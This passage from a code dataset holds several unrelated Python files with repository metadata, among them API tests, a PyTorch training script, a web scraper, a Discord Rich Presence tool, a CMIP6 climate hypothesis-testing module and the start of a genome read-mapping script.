filter_mail(emails)\nfiltered_emails.sort()\nprint(filtered_emails)\n","repo_name":"isoldaliborio/challenge_100daysofcode","sub_path":"15_challenge.py","file_name":"15_challenge.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25292476917","text":"import pytest\n\nfrom app.game.answer.models import Answer\nfrom app.game.question.models import Question\n\n\ndef answer2dict(answer: Answer):\n return {\n \"question_id\": answer.question_id,\n \"title\": answer.title,\n \"is_right\": answer.is_right,\n }\n\n\nclass TestAnswerCreateView:\n async def test_success(self, cli, question: Question):\n data = {\"question_id\": question.id, \"title\": \"test\", \"is_right\": False}\n response = await cli.post(\"/answer.create\", json=data)\n assert response.status == 200\n answer = await Answer.query.gino.first()\n assert await response.json() == answer2dict(answer)\n\n\nclass TestAnswerUpdateView:\n async def test_success(self, cli, answer: Answer, question: Question):\n data = {\"id\": answer.id, \"question_id\": question.id, \"title\": \"test1\", \"is_right\": False}\n response = await cli.put(\"/answer.update\", json=data)\n assert response.status == 200\n answer = await Answer.get(answer.id)\n assert await response.json() == answer2dict(answer)\n\n async def test_bad_id(self, cli, question: Question):\n data = {\"id\": 0, \"question_id\": question.id, \"title\": \"test1\", \"is_right\": False}\n response = await cli.put(\"/answer.update\", json=data)\n assert response.status == 400\n assert await response.json() == {\"code\": \"no_such_record\"}\n\n\nclass TestAnswerDeleteView:\n async def test_success(self, cli, answer: Answer):\n data = {\"id\": answer.id}\n response = await cli.delete(\"/answer.delete\", json=data)\n assert response.status == 204\n assert await response.json() == None\n\n async def test_bad_id(self, cli):\n data = {\"id\": 999}\n response = await cli.delete(\"/answer.delete\", json=data)\n assert response.status == 400\n assert await response.json() == {\"code\": \"no_such_record\"}\n\n\nclass TestAnswerListView:\n @pytest.mark.parametrize(\n \"params,expected_idxs\",\n [\n [{}, [0, 1]],\n [{\"limit\": 1}, [0]],\n [{\"offset\": 1}, [1]],\n [{\"title\": \"test1\"}, [0]],\n [{\"question_id\": 999}, []],\n ],\n )\n async def test_success(\n self,\n cli,\n answers,\n params: dict,\n expected_idxs,\n ):\n response = await cli.get(\"/answer.list\", params=params)\n assert response.status == 200\n assert await response.json() == [\n answer2dict(answers[idx]) for idx in expected_idxs\n ]\n","repo_name":"d11scord/py_jeopardy_bot","sub_path":"tests/answer/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7454279918","text":"import torch\nfrom torch import nn\nimport torch.optim\nimport torch.utils.data\nfrom models import CNN_with_regressor\nfrom datasets import *\n\ndata_folder = './data'\nout_foler = './trained'\nbatch_size = 32\nepochs = 50\ninitial_lr = 1e-4\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") # sets device for model and PyTorch tensors\nworkers = 1 \n\ndef main():\n \n global BEST_name, lowest_loss, best_epoch\n lowest_loss = float('inf')\n \n print ('Initializing the network settings')\n net = CNN_with_regressor() \n optimizer = torch.optim.Adam(params=net.parameters(), lr=initial_lr) \n net.to(device)\n criterion = nn.SmoothL1Loss().to(device)\n criterion_L1 = nn.L1Loss()\n criterion_L2 = nn.MSELoss()\n criterion_L1 = criterion_L1.to(device)\n criterion_L2 = criterion_L2.to(device)\n\n\n\n\n \n print ('Loading datasets')\n train_loader = torch.utils.data.DataLoader(RegressionDataset(data_folder,'TRAIN',transform=None), \n batch_size=batch_size, shuffle=False, \n num_workers=workers, pin_memory=True)\n \n val_loader = torch.utils.data.DataLoader(RegressionDataset(data_folder,'VAL',transform=None),\n batch_size=batch_size, shuffle=False, \n num_workers=workers, pin_memory=True)\n \n test_loader = torch.utils.data.DataLoader(RegressionDataset(data_folder,'TEST',transform=None),\n batch_size=batch_size, shuffle=False, \n num_workers=workers, pin_memory=True) \n \n print ('Testing with random initialization') \n loss_L1 = validate(test_loader,net,criterion_L1)\n loss_L2 = validate(test_loader,net,criterion_L2) \n print ('Testing L1 loss: %.5f ' % (loss_L1))\n print ('Testing L2 loss: %.5f ' % (loss_L2)) \n \n print ('Start training process...') \n num_params = caculate_param(net)/1000000.\n print ('Total number of params: %2.4f M' % (num_params)) \n for epoch in range(1,epochs+1):\n train(train_loader=train_loader,\n network = net, \n criterion=criterion,\n optimizer=optimizer,\n epoch=epoch)\n \n loss = validate(val_loader,net,criterion)\n \n if loss < lowest_loss:\n is_best = True\n lowest_loss = loss\n else:\n is_best = False\n save_checkpoint(epoch,net,is_best)\n # test with the lowest loss model of validation set\n best_checkpoint = torch.load(BEST_name)\n best_network = best_checkpoint['network']\n \n print ('Testing with best checkpoint: epoch %d' % (best_epoch))\n loss_L1 = validate(test_loader,best_network,criterion_L1)\n loss_L2 = validate(test_loader,best_network,criterion_L2) \n print ('Testing L1 loss: %.5f' % (loss_L1))\n print ('Testing L2 loss: %.5f' % (loss_L2))\n \n \ndef train(train_loader,network,criterion,optimizer,epoch,print_period = 1000):\n \"\"\"\n Train model \n\n :param train_loader: training data loader\n :param network: network \n :param criterion: training criterion\n :param optimizer: optimizer\n :param epoch: epoch now\n :param print_period: period for sreen show\n \n \"\"\"\n \n network.train()\n \n for i, (corrs,imgs) in enumerate(train_loader,start = 1):\n imgs = imgs.to(device)\n \n targets = corrs.to(device)\n \n \n pred_corrs = network(imgs)\n \n loss = criterion(pred_corrs,targets)\n \n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if i % print_period == 0:\n print ('Epoch: %2d/%2d\\t'\n 'Iter: %4d/%4d \\t' \n 'Loss: %.5f' % (epoch,epochs,i,len(train_loader),loss))\n \ndef validate(val_loader,network,criterion):\n \"\"\"\n Evaluate model checkpoint.\n\n :param val_loader: the epoch now\n :param network: network \n :param criterion: evaluation criterion\n return the average loss on validation set\n \"\"\"\n \n network.eval()\n loss_tmp = 0\n with torch.no_grad():\n for i, (corrs,imgs) in enumerate(val_loader):\n imgs = imgs.to(device)\n targets = corrs.to(device)\n \n pred_corrs = network(imgs)\n \n loss = criterion(pred_corrs,targets) \n loss_tmp = loss_tmp + loss.item()\n return loss_tmp/len(val_loader)\n \ndef save_checkpoint(epoch, network,is_best):\n \"\"\"\n Saves model checkpoint.\n\n :param epoch: the epoch now\n :param network: trained_network to be saved\n :param is_best: is this checkpoint the best so far?\n \"\"\"\n global BEST_name,best_epoch\n state = {'epoch': epoch,\n 'network' :network} \n \n \n filename = out_foler+'/checkpoint_epoch_' + str(epoch) + '.pth.tar'\n torch.save(state, filename)\n # If this checkpoint is the best so far, store a copy so it doesn't get overwritten by a worse checkpoint\n if is_best:\n best_epoch = epoch\n BEST_name = out_foler+ '/BEST_checkpoint.pth.tar'\n torch.save(state, BEST_name) \n \ndef caculate_param(network):\n \"\"\"\n Return the total numbers of trainable parameters\n \n :param network: network that is aimed to be caculated\n \"\"\"\n return sum(p.numel() for p in network.parameters() if p.requires_grad)\n \n \nif __name__ == '__main__':\n main()","repo_name":"guantinglin/PicCollage-ML-Quiz","sub_path":"Correlation_estimation/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27236706648","text":"'''\nImplement pow(x, n), which calculates x raised to the power n (xn).\n\nExample 1:\n\nInput: 2.00000, 10\nOutput: 1024.00000\nExample 2:\n\nInput: 2.10000, 3\nOutput: 9.26100\n\n'''\ndef myPow(x,n):\n if not n:\n return 1\n \n neg = False\n if(n<0):\n n*=-1\n neg = True\n\n res = 1\n while n:\n if(n%2==1): \n res *=x\n x*=x\n n>>=1\n\n return 1/res if neg else res\nx=2.00000\nn=10\nprint(myPow(x,n))\n ","repo_name":"parulsharma-121/CodingQuestions","sub_path":"day_118_powx_n.py","file_name":"day_118_powx_n.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"33431206415","text":"\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = 'http://www.santostang.com/'\np = requests.get(url)\nprint(p.text)\nsoup = BeautifulSoup(p.text,\"lxml\")\ntitle = soup.find(\"h1\",class_=\"post-title\").a.text.strip()\nprint(title)","repo_name":"leeCoding/Python","sub_path":"Client/RequestTest.py","file_name":"RequestTest.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"47015329764","text":"import time, struct, os, colorama\nfrom pypresence import *\n\nclass DiscordRPC:\n \"\"\" Discord Rich Presence Controller \"\"\"\n\n def __init__(RPC):\n clientid = input(f'[?] Applications Client ID: ')\n rpcstatus = input(f'[?] Applications Status: ')\n rpcdetails = input(f'[?] Applications Details: ')\n refreshtime = input(f'[?] Applications Refresh Time: ')\n\n largeiconname = input(f'[?] Applications Large Icons Name: ')\n largeicontext = input(f'[?] Large Icons Text: ')\n smalliconname = input(f'[?] Applications Small Icons Name: ')\n smallicontext = input(f'[?] Small Icons Text: ')\n\n button1text = input(f'[?] 1st Buttons Name: ')\n button1link = input(f'[?] 1st Buttons Link: ')\n button2text = input(f'[?] 2nd Buttons Name: ')\n button2link = input(f'[?] 2nd Buttons Link: ')\n\n def Menu(RPC):\n os.system('cls')\n print(f\"\"\"\n ██████╗ ██╗ ██████╗ █████╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ █████╗\n ██╔══██╗██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗ ██╔══██╗██╔══██╗██╔══██╗\n ██║ ██║██║╚█████╗ ██║ ╚═╝██║ ██║██████╔╝██║ ██║█████╗██████╔╝██████╔╝██║ ╚═╝\n ██║ ██║██║ ╚═══██╗██║ ██╗██║ ██║██╔══██╗██║ ██║╚════╝██╔══██╗██╔═══╝ ██║ ██╗\n ██████╔╝██║██████╔╝╚█████╔╝╚█████╔╝██║ ██║██████╔╝ ██║ ██║██║ ╚█████╔╝\n ╚═════╝ ╚═╝╚═════╝ ╚════╝ ╚════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝╚═╝ ╚════╝ \n \"\"\")\n\n def Start(RPC):\n RPC.Menu()\n RPC = Presence(RPC.clientid)\n RPC.connect()\n starttime = int(time.time())\n\n try:\n print(f'[/] Discord-RPC Started Successfully...')\n while True:\n RPC.update(\n state = RPC.rpcdetails,\n details = RPC.rpcstatus,\n large_image = RPC.largeiconname,\n large_text = RPC.largeicontext,\n small_image = RPC.smalliconname,\n small_text = RPC.smallicontext,\n start = starttime,\n buttons = [\n {\"label\": RPC.button1text, \"url\": RPC.button1link},\n {\"label\": RPC.button2text, \"url\": RPC.button2link}\n ]\n )\n time.sleep(int(refreshtime))\n except pypresence.exceptions.InvalidPipe:\n print(f\"\\n[!] Make sure Discord is Running!\")\n except pypresence.exceptions.ServerError:\n print(f\"\\n[!] Please make sure you entered the correct Values!\")\n\nRPC = DiscordRPC()\nRPC.Start()\n","repo_name":"5l1v3r1/discordrpc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16471415351","text":"import numpy as np\nimport pickle\nimport os\nimport sys\nfrom tqdm import tqdm\n\nfrom copy import deepcopy\n\n# from sklearn.preprocessing import StandardScaler\nfrom scipy.stats import spearmanr\n\nfrom robustDA.process_cmip6 import read_files_cmip6, read_forcing_cmip6\nfrom robustDA.processing import split_train_test\nfrom robustDA.anchor_regression import (\n cross_validation_gamma_lambda,\n)\n\n\ndef test_DA(params_climate, params_anchor):\n\n target = params_climate[\"target\"]\n anchor = params_climate[\"anchor\"]\n gamma_vals = params_anchor[\"gamma\"]\n h_anchors = params_anchor[\"h_anchors\"]\n\n B = 50\n cv_vals = 50\n lambda_vals = np.logspace(0, 9, cv_vals)\n grid = (72, 144)\n p = grid[0] * grid[1]\n\n rmse_train_lin = np.zeros([B, len(gamma_vals), cv_vals])\n rmse_PA_train_lin = np.zeros([B, len(gamma_vals), cv_vals])\n corr_train_lin = np.zeros([B, len(gamma_vals), cv_vals])\n mi_train_lin = np.zeros([B, len(gamma_vals), cv_vals])\n\n rmse_test_lin = np.zeros([B, len(gamma_vals), cv_vals])\n rmse_PA_test_lin = np.zeros([B, len(gamma_vals), cv_vals])\n corr_test_lin = np.zeros([B, len(gamma_vals), cv_vals])\n mi_test_lin = np.zeros([B, len(gamma_vals), cv_vals])\n\n coef_raw_opt_lin = np.zeros([B, p])\n coef_raw_opt_ridge_lin = np.zeros([B, p])\n y_test_true = [[] for i in range(B)]\n y_test_pred_lin = [[] for i in range(B)]\n y_test_pred_ridge_lin = [[] for i in range(B)]\n y_anchor_test = [[] for i in range(B)]\n\n ind_gamma_opt_lin = np.zeros([B, 1])\n ind_lambda_opt_lin = np.zeros([B, 1])\n ind_lambda_opt_ridge_lin = np.zeros([B, 1])\n ind_vect_ideal_obj1_lin = np.zeros([B, 2])\n ind_vect_ideal_obj2_lin = np.zeros([B, 2])\n gamma_opt_lin = np.zeros([B, 1])\n lambda_opt_lin = np.zeros([B, 1])\n lambda_opt_ridge_lin = np.zeros([B, 1])\n\n rmse_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n rmse_PA_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n corr_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n corr2_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n mi_train_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n\n rmse_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n rmse_PA_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n corr_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n corr2_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n mi_test_nonlin = np.zeros([B, len(gamma_vals), cv_vals])\n\n coef_raw_opt_nonlin = np.zeros([B, p])\n coef_raw_opt_ridge_nonlin = np.zeros([B, p])\n y_test_pred_nonlin = [[] for i in range(B)]\n y_test_pred_ridge_nonlin = [[] for i in range(B)]\n\n ind_gamma_opt_nonlin = np.zeros([B, 1])\n ind_lambda_opt_nonlin = np.zeros([B, 1])\n ind_lambda_opt_ridge_nonlin = np.zeros([B, 1])\n ind_vect_ideal_obj1_nonlin = np.zeros([B, 2])\n ind_vect_ideal_obj2_nonlin = np.zeros([B, 2])\n gamma_opt_nonlin = np.zeros([B, 1])\n lambda_opt_nonlin = np.zeros([B, 1])\n lambda_opt_ridge_nonlin = np.zeros([B, 1])\n\n modelsDataList, modelsInfoFrame = read_files_cmip6(\n params_climate, norm=True\n )\n\n nbFiles = len(modelsDataList)\n models = sorted(set([modelsDataList[i].model for i in range(nbFiles)]))\n\n alpha_bagging_lin = np.zeros(len(models))\n power_bagging_lin = np.zeros(len(models))\n nb_models_bagging = np.zeros(len(models))\n\n alpha_bagging_nonlin = np.zeros(len(models))\n power_bagging_nonlin = np.zeros(len(models))\n\n if len(h_anchors) == 0:\n filename = \"HT_\" + target + \"_\" + anchor + \"_B\" + str(B) + \"_CV3\"\n else:\n filename = (\n \"HT_\"\n + target\n + \"_\"\n + anchor\n + \"_\"\n + \"-\".join(h_anchors)\n + \"_B\"\n + str(B)\n + \"_CV3\"\n + \"_spearman95_coefRaw\"\n )\n\n sys.stdout = open(\"./../output/logFiles/\" + filename + \"_PA.log\", \"w\")\n\n for b in tqdm(range(B)):\n print(\n \"\\n\\n ============== Bag \" + str(b) + \" =================== \\n\",\n flush=True,\n )\n\n dict_models = split_train_test(\n modelsDataList, modelsInfoFrame, target, anchor\n )\n\n (\n rmse_train_bag_lin,\n rmse_PA_train_bag_lin,\n corr_train_bag_lin,\n mi_train_bag_lin,\n coef_raw_bag_opt_lin,\n coef_std_bag_opt_lin,\n coef_raw_bag_opt_ridge_lin,\n coef_std_bag_opt_ridge_lin,\n rmse_test_bag_lin,\n rmse_PA_test_bag_lin,\n corr_test_bag_lin,\n mi_test_bag_lin,\n ind_gamma_bag_opt_lin,\n ind_lambda_bag_opt_lin,\n ind_lambda_bag_opt_ridge_lin,\n ind_vect_ideal_obj1_bag_lin,\n ind_vect_ideal_obj2_bag_lin,\n rmse_train_bag_nonlin,\n rmse_PA_train_bag_nonlin,\n corr_train_bag_nonlin,\n corr2_train_bag_nonlin,\n mi_train_bag_nonlin,\n coef_raw_bag_opt_nonlin,\n coef_std_bag_opt_nonlin,\n coef_raw_bag_opt_ridge_nonlin,\n coef_std_bag_opt_ridge_nonlin,\n rmse_test_bag_nonlin,\n rmse_PA_test_bag_nonlin,\n corr_test_bag_nonlin,\n corr2_test_bag_nonlin,\n mi_test_bag_nonlin,\n ind_gamma_bag_opt_nonlin,\n ind_lambda_bag_opt_nonlin,\n ind_lambda_bag_opt_ridge_nonlin,\n ind_vect_ideal_obj1_bag_nonlin,\n ind_vect_ideal_obj2_bag_nonlin,\n ) = cross_validation_gamma_lambda(\n modelsDataList,\n modelsInfoFrame,\n deepcopy(dict_models),\n params_climate,\n gamma_vals,\n lambda_vals,\n h_anchors,\n display_CV_plot=True,\n )\n\n # sc_y_train = StandardScaler(with_mean=True, with_std=True)\n # y_train_std = sc_y_train.fit_transform(dict_models[\"y_train\"].values)\n\n # sc_X_test = StandardScaler(with_mean=True, with_std=True)\n # X_test_std = sc_X_test.fit_transform(dict_models[\"X_test\"].values)\n\n y_test_true_bag = dict_models[\"y_test\"].values\n\n y_test_true[b].append(y_test_true_bag)\n y_anchor_test[b].append(\n dict_models[\"y_anchor_test\"].values\n ) # do not change the anchor\n\n \"\"\" Linear anchor \"\"\"\n # y_test_pred_std = np.array(\n # np.matmul(X_test_std, np.transpose(coef_std_bag_opt_lin))\n # )\n # y_test_pred_bag = sc_y_train.inverse_transform(y_test_pred_std)\n\n y_test_pred_bag = np.array(\n np.matmul(\n dict_models[\"X_test\"].values,\n np.transpose(coef_raw_bag_opt_lin),\n )\n )\n\n # y_test_pred_std_ridge = np.array(\n # np.matmul(X_test_std, np.transpose(coef_std_bag_opt_ridge_lin))\n # )\n # y_test_pred_bag_ridge = sc_y_train.inverse_transform(y_test_pred_std_ridge)\n\n y_test_pred_bag_ridge = np.array(\n np.matmul(\n dict_models[\"X_test\"].values,\n np.transpose(coef_raw_bag_opt_ridge_lin),\n )\n )\n\n rmse_train_lin[b, :, :] = rmse_train_bag_lin\n rmse_PA_train_lin[b, :, :] = rmse_PA_train_bag_lin\n corr_train_lin[b, :, :] = corr_train_bag_lin\n mi_train_lin[b, :, :] = mi_train_bag_lin\n\n rmse_test_lin[b, :, :] = rmse_test_bag_lin\n rmse_PA_test_lin[b, :, :] = rmse_PA_test_bag_lin\n corr_test_lin[b, :, :] = corr_test_bag_lin\n mi_test_lin[b, :, :] = mi_test_bag_lin\n\n coef_raw_opt_lin[b, :] = coef_raw_bag_opt_lin\n coef_raw_opt_ridge_lin[b, :] = coef_raw_bag_opt_ridge_lin\n\n y_test_pred_lin[b].append(y_test_pred_bag)\n y_test_pred_ridge_lin[b].append(y_test_pred_bag_ridge)\n\n ind_gamma_opt_lin[b] = ind_gamma_bag_opt_lin\n ind_lambda_opt_lin[b] = ind_lambda_bag_opt_lin\n ind_lambda_opt_ridge_lin[b] = ind_lambda_bag_opt_ridge_lin\n gamma_opt_lin[b] = gamma_vals[ind_gamma_bag_opt_lin]\n lambda_opt_lin[b] = lambda_vals[ind_lambda_bag_opt_lin]\n lambda_opt_ridge_lin[b] = lambda_vals[ind_lambda_bag_opt_ridge_lin]\n\n ind_vect_ideal_obj1_lin[b] = ind_vect_ideal_obj1_bag_lin\n ind_vect_ideal_obj2_lin[b] = ind_vect_ideal_obj2_bag_lin\n\n (\n alpha_per_bag_lin,\n power_per_bag_lin,\n nb_models_per_bag,\n ) = test_DA_per_bag(\n params_climate, models, dict_models, y_test_pred_bag\n )\n\n alpha_bagging_lin = alpha_bagging_lin + alpha_per_bag_lin\n power_bagging_lin = power_bagging_lin + power_per_bag_lin\n nb_models_bagging = nb_models_bagging + nb_models_per_bag\n\n \"\"\" Nonlinear anchor \"\"\"\n # y_test_pred_std = np.array(\n # np.matmul(X_test_std, np.transpose(coef_std_bag_opt_nonlin))\n # )\n # y_test_pred_bag = sc_y_train.inverse_transform(y_test_pred_std)\n\n y_test_pred_bag = np.array(\n np.matmul(\n dict_models[\"X_test\"].values,\n np.transpose(coef_raw_bag_opt_nonlin),\n )\n )\n\n # y_test_pred_std_ridge = np.array(\n # np.matmul(X_test_std, np.transpose(coef_std_bag_opt_ridge_nonlin))\n # )\n # y_test_pred_bag_ridge = sc_y_train.inverse_transform(y_test_pred_std_ridge)\n\n y_test_pred_bag_ridge = np.array(\n np.matmul(\n dict_models[\"X_test\"].values,\n np.transpose(coef_raw_bag_opt_ridge_nonlin),\n )\n )\n\n rmse_train_nonlin[b, :, :] = rmse_train_bag_nonlin\n rmse_PA_train_nonlin[b, :, :] = rmse_PA_train_bag_nonlin\n corr_train_nonlin[b, :, :] = corr_train_bag_nonlin\n corr2_train_nonlin[b, :, :] = corr2_train_bag_nonlin\n mi_train_nonlin[b, :, :] = mi_train_bag_nonlin\n\n rmse_test_nonlin[b, :, :] = rmse_test_bag_nonlin\n rmse_PA_test_nonlin[b, :, :] = rmse_PA_test_bag_nonlin\n corr_test_nonlin[b, :, :] = corr_test_bag_nonlin\n corr2_test_nonlin[b, :, :] = corr2_test_bag_nonlin\n mi_test_nonlin[b, :, :] = mi_test_bag_nonlin\n\n coef_raw_opt_nonlin[b, :] = coef_raw_bag_opt_nonlin\n coef_raw_opt_ridge_nonlin[b, :] = coef_raw_bag_opt_ridge_nonlin\n\n y_test_pred_nonlin[b].append(y_test_pred_bag)\n y_test_pred_ridge_nonlin[b].append(y_test_pred_bag_ridge)\n\n ind_gamma_opt_nonlin[b] = ind_gamma_bag_opt_nonlin\n ind_lambda_opt_nonlin[b] = ind_lambda_bag_opt_nonlin\n ind_lambda_opt_ridge_nonlin[b] = ind_lambda_bag_opt_ridge_nonlin\n gamma_opt_nonlin[b] = gamma_vals[ind_gamma_bag_opt_nonlin]\n lambda_opt_nonlin[b] = lambda_vals[ind_lambda_bag_opt_nonlin]\n lambda_opt_ridge_nonlin[b] = lambda_vals[\n ind_lambda_bag_opt_ridge_nonlin\n ]\n\n ind_vect_ideal_obj1_nonlin[b] = ind_vect_ideal_obj1_bag_nonlin\n ind_vect_ideal_obj2_nonlin[b] = ind_vect_ideal_obj2_bag_nonlin\n\n (\n alpha_per_bag_nonlin,\n power_per_bag_nonlin,\n nb_models_per_bag,\n ) = test_DA_per_bag(\n params_climate, models, dict_models, y_test_pred_bag\n )\n\n alpha_bagging_nonlin = alpha_bagging_nonlin + alpha_per_bag_nonlin\n power_bagging_nonlin = power_bagging_nonlin + power_per_bag_nonlin\n\n alpha_bagging_lin = np.array(\n [\n alpha_bagging_lin[i] / nb_models_bagging[i]\n if nb_models_bagging[i] != 0\n else 0\n for i in range(len(models))\n ]\n )\n power_bagging_lin = np.array(\n [\n power_bagging_lin[i] / nb_models_bagging[i]\n if nb_models_bagging[i] != 0\n else 0\n for i in range(len(models))\n ]\n )\n\n alpha_bagging_nonlin = np.array(\n [\n alpha_bagging_nonlin[i] / nb_models_bagging[i]\n if nb_models_bagging[i] != 0\n else 0\n for i in range(len(models))\n ]\n )\n power_bagging_nonlin = np.array(\n [\n power_bagging_nonlin[i] / nb_models_bagging[i]\n if nb_models_bagging[i] != 0\n else 0\n for i in range(len(models))\n ]\n )\n\n dirname = \"./../output/data/\"\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n\n with open(dirname + filename + \"_valPA.pkl\", \"wb\") as f:\n pickle.dump(\n [\n params_climate,\n params_anchor,\n lambda_vals,\n y_test_true,\n y_anchor_test,\n ind_gamma_opt_lin,\n ind_lambda_opt_lin,\n ind_lambda_opt_ridge_lin,\n gamma_opt_lin,\n lambda_opt_lin,\n lambda_opt_ridge_lin,\n ind_vect_ideal_obj1_lin,\n ind_vect_ideal_obj2_lin,\n coef_raw_opt_lin,\n coef_raw_opt_ridge_lin,\n y_test_pred_lin,\n y_test_pred_ridge_lin,\n rmse_train_lin,\n rmse_PA_train_lin,\n corr_train_lin,\n mi_train_lin,\n rmse_test_lin,\n rmse_PA_test_lin,\n corr_test_lin,\n mi_test_lin,\n alpha_bagging_lin,\n power_bagging_lin,\n ind_gamma_opt_nonlin,\n ind_lambda_opt_nonlin,\n ind_lambda_opt_ridge_nonlin,\n gamma_opt_nonlin,\n lambda_opt_nonlin,\n lambda_opt_ridge_nonlin,\n ind_vect_ideal_obj1_nonlin,\n ind_vect_ideal_obj2_nonlin,\n coef_raw_opt_nonlin,\n coef_raw_opt_ridge_nonlin,\n y_test_pred_nonlin,\n y_test_pred_ridge_nonlin,\n rmse_train_nonlin,\n rmse_PA_train_nonlin,\n corr_train_nonlin,\n corr2_train_nonlin,\n mi_train_nonlin,\n rmse_test_nonlin,\n rmse_PA_test_nonlin,\n corr_test_nonlin,\n corr2_test_nonlin,\n mi_test_nonlin,\n alpha_bagging_nonlin,\n power_bagging_nonlin,\n nb_models_bagging,\n models,\n modelsInfoFrame,\n ],\n f,\n )\n\n sys.stdout.close()\n\n\ndef test_DA_per_bag(params_climate, models, dict_models, y_test_pred):\n target = params_climate[\"target\"]\n start_date = params_climate[\"startDate\"]\n end_date = params_climate[\"endDate\"]\n\n alpha_per_bag = np.zeros(len(models))\n power_per_bag = np.zeros(len(models))\n nb_models_per_bag = np.zeros(len(models))\n\n yf = read_forcing_cmip6(\"historical\", target, start_date, end_date)\n\n nb_years = end_date - start_date + 1\n\n test_models = set(\n [\n dict_models[\"testFiles\"][i].split(\"_\")[2][:3]\n for i in range(len(dict_models[\"testFiles\"]))\n ]\n )\n\n print(test_models, flush=True)\n\n \"\"\" For each model in the test set, build the null from the rest of the models in the test set,\n compute the threshold, then compute \\alpha and \\beta \"\"\"\n for i in range(len(models)):\n if models[i] in test_models:\n ts_null = []\n test_model_files = []\n test_model_ts_vals = []\n\n for j in range(len(dict_models[\"testFiles\"])):\n # ''' Linear correlation (Pearson) '''\n # ts = np.corrcoef(\n # np.transpose(\n # y_test_pred[j * nb_years : (j + 1) * nb_years]\n # ),\n # np.transpose(yf.values.reshape(-1, 1)),\n # )[0, 1]\n\n \"\"\" Rank correlation (Spearman) \"\"\"\n ts = spearmanr(\n y_test_pred[j * nb_years : (j + 1) * nb_years], yf.values\n ).correlation\n\n # ''' First differences -- rank correlation '''\n # diff_pred = np.diff(y_test_pred[j * nb_years : (j + 1) * nb_years])\n # diff_true = yf.diff().values[1:]\n # ts = spearmanr(diff_pred, diff_true).correlation\n\n if dict_models[\"testFiles\"][j].split(\"_\")[2][:3] != models[i]:\n if (\n dict_models[\"testFiles\"][j].split(\"_\")[3]\n == \"piControl\"\n ):\n ts_null.append(ts)\n else:\n test_model_files.append(dict_models[\"testFiles\"][j])\n test_model_ts_vals.append(ts)\n\n ts_null_mean = np.mean(ts_null)\n ts_null_std = np.std(\n ts_null\n ) # for one control run per model, otherwise also need to compute the variance\n print(\n str(i)\n + \" --- \"\n + models[i]\n + \" --- mean = \"\n + str(ts_null_mean)\n + \" --- std = \"\n + str(ts_null_std)\n )\n\n alpha = 0\n power = 0\n nb_control_runs = 0\n nb_forced_runs = 0\n for k in range(len(test_model_files)):\n print(test_model_files[k])\n if (\n test_model_ts_vals[k]\n > ts_null_mean\n + 1.96 * ts_null_std # 1.96 (95%) or 2.326 (98%)\n or test_model_ts_vals[k]\n < ts_null_mean - 1.96 * ts_null_std\n ):\n test_val = 1 # Reject H0\n else:\n test_val = 0\n\n # TO DO: extend for other forcings\n if test_model_files[k].split(\"_\")[3] == \"piControl\":\n nb_control_runs = nb_control_runs + 1\n if test_val == 1:\n alpha = alpha + 1\n elif test_model_files[k].split(\"_\")[3] != \"piControl\":\n nb_forced_runs = nb_forced_runs + 1\n if test_val == 1:\n power = power + 1\n\n print(\n test_model_files[k].split(\"_\")[3]\n + \" --- test = \"\n + str(test_val)\n )\n\n print(\"nb_controls = \" + str(nb_control_runs))\n print(\"nb_forced = \" + str(nb_forced_runs))\n print(\"alpha = \" + str(alpha))\n print(\"power = \" + str(power))\n\n if nb_control_runs != 0:\n alpha_per_bag[i] = alpha / nb_control_runs\n if nb_forced_runs != 0:\n power_per_bag[i] = power / nb_forced_runs\n nb_models_per_bag[i] = 1\n\n print(alpha_per_bag)\n print(power_per_bag)\n\n return alpha_per_bag, power_per_bag, nb_models_per_bag\n","repo_name":"eszekely/robustDA","sub_path":"robustDA/hypothesis_testing.py","file_name":"hypothesis_testing.py","file_ext":"py","file_size_in_byte":19152,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"17813706521","text":"\"\"\"\nDESCRIPTION:\n(1) Map reads to host genome (bowtie2)\n(2) Convert sam to bam, sort bam, compute depth (samtools)\n\nARGUMENTS:\nargs[1] = \nargs[2] = \nargs[3] = \n\"\"\"\n\nimport os\nimport sys\nimport time\nimport main\n\nhome = \"/rds/general/user/cl3820/\"\n\nargs = sys.argv\n\nfile1 = args[1]+\"_1\"\nfile2 = args[1]+\"_2\"\n\nfq_gz1 = home+\"home/clean_data/\"+file1+\".fq.gz\"\nfq_gz2 = home+\"home/clean_data/\"+file2+\".fq.gz\"\n\nprint(\"Reference genome: \"+args[2])\nprint(\"Start mapping...\")\n\n#mapping through bowtie2\nstart = 